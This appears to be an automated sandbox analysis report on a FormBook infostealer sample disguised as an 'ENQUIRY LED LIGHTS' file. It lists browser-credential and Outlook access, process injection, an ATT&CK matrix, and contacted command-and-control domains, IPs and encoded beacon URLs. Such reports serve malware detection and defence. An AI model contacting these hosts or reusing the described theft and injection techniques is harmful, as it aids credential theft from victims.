            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeCode function: 3_2_0044813F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_0044813F
            Source: C:\Users\user\Desktop\ENQUIRY LED LIGHTS.pif.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Tries to steal Mail credentials (via file / registry access)
            Source: C:\Windows\SysWOW64\SearchFilterHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.ENQUIRY LED LIGHTS.pif.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.2977288553.0000000002680000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977216188.0000000005040000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2977133044.0000000004FF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2071235910.0000000004630000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2068550598.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.2069154376.0000000002CD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000008.00000002.2975568226.0000000003290000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
            Native API            		1
            DLL Side-Loading            		312
            Process Injection            		1
            Masquerading            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services1
            Email Collection            		1
            Encrypted Channel            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
            Abuse Elevation Control Mechanism            		1
            Disable or Modify Tools            		LSASS Memory131
            Security Software Discovery            		Remote Desktop Protocol1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		41
            Virtualization/Sandbox Evasion            		Security Account Manager2
            Process Discovery            		SMB/Windows Admin Shares1
            Data from Local System            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
            Process Injection            		NTDS41
            Virtualization/Sandbox Evasion            		Distributed Component Object ModelInput Capture4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Deobfuscate/Decode Files or Information            		LSA Secrets1
            Application Window Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Abuse Elevation Control Mechanism            		Cached Domain Credentials2
            File and Directory Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
            Obfuscated Files or Information            		DCSync114
            System Information Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
            Software Packing            		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
            DLL Side-Loading            		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1550102 Sample: ENQUIRY LED LIGHTS.pif.exe Startdate: 06/11/2024 Architecture: WINDOWS Score: 100 32 www.worldoffun.online 2->32 34 www.windowmart.online 2->34 36 5 other IPs or domains 2->36 46 Suricata IDS alerts for network traffic 2->46 48 Malicious sample detected (through community Yara rule) 2->48 50 Multi AV Scanner detection for submitted file 2->50 52 6 other signatures 2->52 10 ENQUIRY LED LIGHTS.pif.exe 3 2->10         started        signatures3 process4 file5 30 C:\Users\...NQUIRY LED LIGHTS.pif.exe.log, ASCII 10->30 dropped 13 ENQUIRY LED LIGHTS.pif.exe 10->13         started        16 ENQUIRY LED LIGHTS.pif.exe 10->16         started        process6 signatures7 64 Maps a DLL or memory area into another process 13->64 18 bdtKgWWjtPR.exe 13->18 injected process8 signatures9 44 Found direct / indirect Syscall (likely to bypass EDR) 18->44 21 SearchFilterHost.exe 13 18->21         started        process10 signatures11 54 Tries to steal Mail credentials (via file / registry access) 21->54 56 Tries to harvest and steal browser information (history, passwords, etc) 21->56 58 Modifies the context of a thread in another process (thread injection) 21->58 60 3 other signatures 21->60 24 bdtKgWWjtPR.exe 21->24 injected 28 firefox.exe 21->28         started        process12 dnsIp13 38 www.windowmart.online 162.0.231.203, 51431, 51432, 51433 NAMECHEAP-NETUS Canada 24->38 40 www.waidzeitcz.shop 172.67.163.171, 51427, 51428, 51429 CLOUDFLARENETUS United States 24->40 42 2 other IPs or domains 24->42 62 Found direct / indirect Syscall (likely to bypass EDR) 24->62 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ENQUIRY LED LIGHTS.pif.exe26%ReversingLabsWin32.Trojan.Sonbokli
            ENQUIRY LED LIGHTS.pif.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_wpb.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff20%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/style.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.asklifeclarity.shop/b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pg0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/builders/assets/type-builder.css?v0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme-async.js?ver=7.1.140%Avira URL Cloudsafe
            http://www.asklifeclarity.shop/b5w1/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.m0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.10%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/dynamic_style.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.6.20%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto-child/style.css?ver=6.6.20%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/bootstrap.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?ver0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?ve0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js?0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/#person0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-includes/js/imagesloaded.min.js?ver=5.0.00%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/css/plugins.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/webfont.js0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-content/plugins/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.selectric.min.js?ver=1.9.60%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/xmlrpc.php0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?v0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/woocommerce-theme.js?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/shortcodes//assets/cp-attribute-ta0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/owl.carousel.min.js?ver=2.3.40%Avira URL Cloudsafe
            http://www.windowmart.online/uftp/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/css/js_composer.min.css?ver=7.80%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/shortcodes.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/css/style.css?ver=3.30%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-admin/admin-ajax.php0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/client/blocks/wc-blocks.css?ver=wc-0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-blockui/jquery.blockUI.mi0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wp-json/0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/cart/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/js/yith-wcan-s0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/umew/0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/feed/0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/sourcebuster/sourcebuster.min.js0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pg0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/live-search/live-search.min.js?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/Inter-VariableFont_slnt0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme.js?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/js-cookie/js.cookie.min.js?ver=20%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/revslider/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme/shop/login-style/account-login.css?ver=0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/shop/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/js/libs/jquery.magnific-popup.min.js?ver=1.1.00%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/order-attribution.min.j0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.selectBox.m0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/wishlist/0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-ajax-navigation/assets/css/shortcodes0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.10%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_shop.css?ver=7.1.140%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/jquery-cookie/jquery.cookie.min.0%Avira URL Cloudsafe
            http://www.windowmart.online0%Avira URL Cloudsafe
            https://www.waidzeitcz.shop/my-account/0%Avira URL Cloudsafe
            http://www.ontoweightloss.health/3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pg0%Avira URL Cloudsafe
            http://www.waidzeitcz.shop/wp-content/themes/porto/inc/lib/woocommerce-shipping-progress-bar/shippin0%Avira URL Cloudsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            ontoweightloss.health
            		3.33.130.190
            		truetrue
              		unknown
              www.windowmart.online
              		162.0.231.203
              		truetrue
                		unknown
                www.asklifeclarity.shop
                		75.2.103.23
                		truetrue
                  		unknown
                  www.waidzeitcz.shop
                  		172.67.163.171
                  		truetrue
                    		unknown
                    15.164.165.52.in-addr.arpa
                    		unknown
                    		unknownfalse
                      		high
                      www.ontoweightloss.health
                      		unknown
                      		unknowntrue
                        		unknown
                        www.worldoffun.online
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.asklifeclarity.shop/b5w1/?ZtyPTl=bzIaAv/CNdT8rB9nL5XCeS9pdKyCtoE63OuxqOgiGohGR0wxghAT+4/hTXFB6xdR1WxfOWCw15kwsG97q/hVWyGWfRtZYXTzGedSrFAZ3YSj/Eq6qe9iIhY=&ZbwL=jPj4WxVP-Pgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.asklifeclarity.shop/b5w1/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.windowmart.online/uftp/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.waidzeitcz.shop/umew/true
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.waidzeitcz.shop/umew/?ZtyPTl=QXTWCFaCrqsBcZ0jvGl1ttfHxXcpVNWda4HOn4zcEeaqQvbbnXannTD248WElJ9FFMtE83bbHMtecG5XDZ8D8EJV2R1Y4Xui2kuIw8EG0Z1Ay2DF3ANMa14=&ZbwL=jPj4WxVP-Pgtrue
                          • Avira URL Cloud: safe
                          		unknown
                          http://www.ontoweightloss.health/3wgj/?ZtyPTl=WahIZj+xW4EOtFjZM0RfH4og0GPWjtJKXvB/uzSyT+J27ktzn1W7D9+ZXG1vui76WddGh9yI59wk4TQKFvzjrMXbikQGJsnU4nQWN9yQ+zInnnXCjF8kPco=&ZbwL=jPj4WxVP-Pgtrue
                          • Avira URL Cloud: safe
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabSearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/fonts/cardo_normal_400.woff2SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.waidzeitcz.shop/wp-content/plugins/yith-woocommerce-wishlist/assets/js/jquery.yith-wcwl.mSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://duckduckgo.com/ac/?q=SearchFilterHost.exe, 00000008.00000003.2449914855.00000000082F8000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              https://ogp.me/ns#SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                		high
                                http://www.waidzeitcz.shop/wp-content/themes/porto/js/theme-async.js?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.waidzeitcz.shop/wp-content/themes/porto/style.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                		unknown
                                http://www.fontbureau.com/designersENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://www.waidzeitcz.shopbdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.waidzeitcz.shop/wp-content/plugins/porto-functionality/builders/assets/type-builder.css?vSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.waidzeitcz.shop/wp-content/themes/porto/css/theme_wpb.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.waidzeitcz.shop/wp-includes/js/jquery/jquery.min.js?ver=3.7.1SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://www.sajatypeworks.comENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.waidzeitcz.shop/wp-content/themes/porto-child/style.css?ver=6.6.2SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.founder.com.cn/cn/cTheENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.waidzeitcz.shop/wp-includes/css/dist/block-library/style.min.css?ver=6.6.2SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/bootstrap.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.waidzeitcz.shop/wp-content/uploads/porto_styles/dynamic_style.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/accounting/accounting.min.js?verSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.waidzeitcz.shop/wp-content/plugins/js_composer/assets/js/dist/js_composer_front.min.js?veSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://www.waidzeitcz.shop/#personbdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.galapagosdesign.com/DPleaseENQUIRY LED LIGHTS.pif.exe, 00000000.00000002.1740454562.0000000006B92000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.waidzeitcz.shop/wp-content/plugins/woocommerce/assets/js/selectWoo/selectWoo.full.min.js?SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.waidzeitcz.shop/wp-includes/js/imagesloaded.min.js?ver=5.0.0SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.waidzeitcz.shop/xmlrpc.phpSearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.waidzeitcz.shop/wp-content/themes/porto/css/plugins.css?ver=7.1.14SearchFilterHost.exe, 00000008.00000002.2978392359.00000000060FA000.00000004.10000000.00040000.00000000.sdmp, bdtKgWWjtPR.exe, 00000009.00000002.2978795965.000000000344A000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
